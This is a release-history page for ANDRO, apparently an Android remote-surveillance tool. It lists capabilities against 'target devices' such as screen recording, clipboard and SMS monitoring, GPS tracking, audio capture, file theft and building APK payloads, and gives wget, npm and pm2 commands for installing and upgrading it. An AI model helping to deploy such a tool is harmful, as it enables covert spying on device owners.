Explore the evolution of ANDRO through its versions
From initial release to the latest features and upcoming developments
Released: Mar 15, 2025
The second major release of ANDRO introduces significant enhancements to the user interface and adds several new monitoring capabilities.
Capture real-time screen recordings from target devices
Monitor clipboard content as it changes
Queue commands for offline devices
Browse and download files from target devices
# Upgrade from V.1.0 to V.2.0
git pull origin main
npm install
pm2 restart all
Released: January 10, 2019
The initial release of ANDRO providing core Android device monitoring capabilities in a cloud-based environment.
Track device location with GPS coordinates
Capture audio from target devices
View and send SMS messages
First-generation APK creation tool
# Install ANDRO V.1.0
wget https://github.com/AryanVBW/ANDRO/releases/download/v.1.0/ANDRO.zip
unzip ANDRO.zip
npm install
pm2 start index.js
pm2 save
The next major update to ANDRO will introduce advanced features and significant improvements to the core functionality.
Have suggestions for the next version of ANDRO?
Submit Feedback